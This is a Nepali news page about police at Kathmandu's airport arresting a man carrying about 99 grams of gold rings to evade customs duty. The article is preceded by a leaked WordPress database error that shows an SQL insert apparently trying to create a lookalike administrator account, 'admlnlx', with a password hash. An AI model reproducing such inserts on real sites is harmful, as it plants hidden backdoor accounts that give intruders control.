WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZQe/Tg/nkRGiJYpZMJGQwzJw6UvlW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:49:23', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१ –
तेह्रथुम श्रीजंग-५ का ३३ वर्षिय यादवप्रसाद दाहाललाई भन्सार छलेर लैजान लागेको अवैध सुनसहित प्रहरीले त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलबाट पक्राउ गरेको छ ।
विमानस्थलको पार्किङ एरियामा विदेशबाट आगमन भएका नेपाली यात्रुको साथबाट सुनको बेरूवा औंठीहरु ४ थान (९९ ग्राम) अन्दाजी ४ लाख ६७ हजार ६ सय ७६ रुपैयाँ बराबरको संकलन गरी भन्सार छली लैजान लागेको अवस्थामा दाहालललाई शुक्रबार प्रहरीले फेला पारेको जनाएको छ । उनलाई प्रहरीले आवश्यक कारबाहीको लागि त्रिभुवन विमानस्थल भन्सार गौचर काठमाडौंमा बुझाएको छ। यसअघि ठूलो मात्रामा सुन मरामद भएको थियो।